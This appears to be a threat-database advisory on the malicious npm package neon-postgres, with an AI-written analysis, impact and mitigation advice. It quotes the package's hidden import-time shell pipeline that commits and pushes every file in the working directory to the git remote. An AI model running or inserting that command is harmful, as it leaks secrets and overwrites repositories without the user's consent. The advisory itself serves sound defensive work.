Skip to main content
Press slash or control plus K to focus the search. Use the arrow keys to navigate results and press enter to open a threat.
Reconnecting to live updates…

Malicious code in neon-postgres (npm)

0
High
Published: 07/14/2026 (07/14/2026, 03:53:07 UTC)
Source: GCVE Database
Product: neon-postgres

Description

The neon-postgres npm package versions 3.5.0 and 3.5.1 contain malicious code that executes a shell command upon import. This command stages, commits, and pushes all untracked and uncommitted files in the current working directory to the configured git remote, potentially leaking sensitive information and overwriting repository state. The package impersonates a legitimate Neon serverless-postgres client, making the malicious behavior stealthy and unexpected.

Affected software

npmghsa
neon-postgres
Affected versions
=3.5.0=3.5.1

Run on your own infrastructure? Check whether these packages are installed with threat-finder — our free open-source scanner.

AI-Powered Analysis

Machine-generated threat intelligence

AILast updated: 07/14/2026, 09:31:37 UTC

Technical Analysis

The neon-postgres package is a malicious clone of the porsager/postgres client. Both its CommonJS and ESM entrypoints execute a shell pipeline immediately when imported, running `pwd && ls -la && git status && git add * && git commit -m "sync" && git push -u origin main` in the installer's current working directory. This causes all untracked and uncommitted files—including potentially sensitive data like secrets and environment files—to be committed and pushed to the remote repository configured as 'origin'. This side-effect occurs silently and leverages the installer's git credentials, risking data leakage and repository integrity compromise. The package name mimics the legitimate Neon serverless-postgres ecosystem to deceive users.

Potential Impact

This malicious package can cause unintended disclosure of private files and secrets by committing and pushing them to a remote git repository without user consent. It can also overwrite branch state on the remote repository, potentially disrupting development workflows or exposing proprietary code. The compromise occurs silently upon importing the package, increasing the risk of unnoticed data leakage and repository tampering.

Mitigation Recommendations

No official patch or remediation is currently available. Users should immediately audit their dependencies for the presence of neon-postgres versions 3.5.0 and 3.5.1 and remove or replace this package. Avoid importing or requiring neon-postgres from untrusted sources. Review git repository history for unauthorized commits and remote pushes caused by this package. Rotate any potentially exposed credentials or secrets. Monitor for suspicious git activity and consider restricting git push permissions where feasible. Patch status is not yet confirmed — check the vendor advisory or trusted security sources for updates.

Pro Console: star threats, build custom feeds, automate alerts via Slack, email & webhooks.Upgrade to Pro

Technical Details

Gcve Source
db.gcve.eu
Osv Id
MAL-2026-10537
Osv Schema Version
1.7.4
Aliases
[]
Ecosystems
["npm"]
Database Specific Severity
null
Cvss Version
null

Threat ID: 6a55ff5d68715ace432f0aa8

Added to database: 07/14/2026, 09:20:29 UTC

Last enriched: 07/14/2026, 09:31:37 UTC

Last updated: 07/29/2026, 14:45:06 UTC

Views: 38

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by
Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

Need more coverage?

Upgrade to Pro Console for AI refresh and higher limits.

For incident response and remediation, OffSeq services can help resolve threats faster.

Latest Threats

Breach by OffSeqOFFSEQFRIENDS — 25% OFF

Check if your credentials are on the dark web

Instant breach scanning across billions of leaked records. Free tier available.

Scan now
OffSeq TrainingCredly Certified

Lead Pen Test Professional

Technical5-day eLearningPECB Accredited
View courses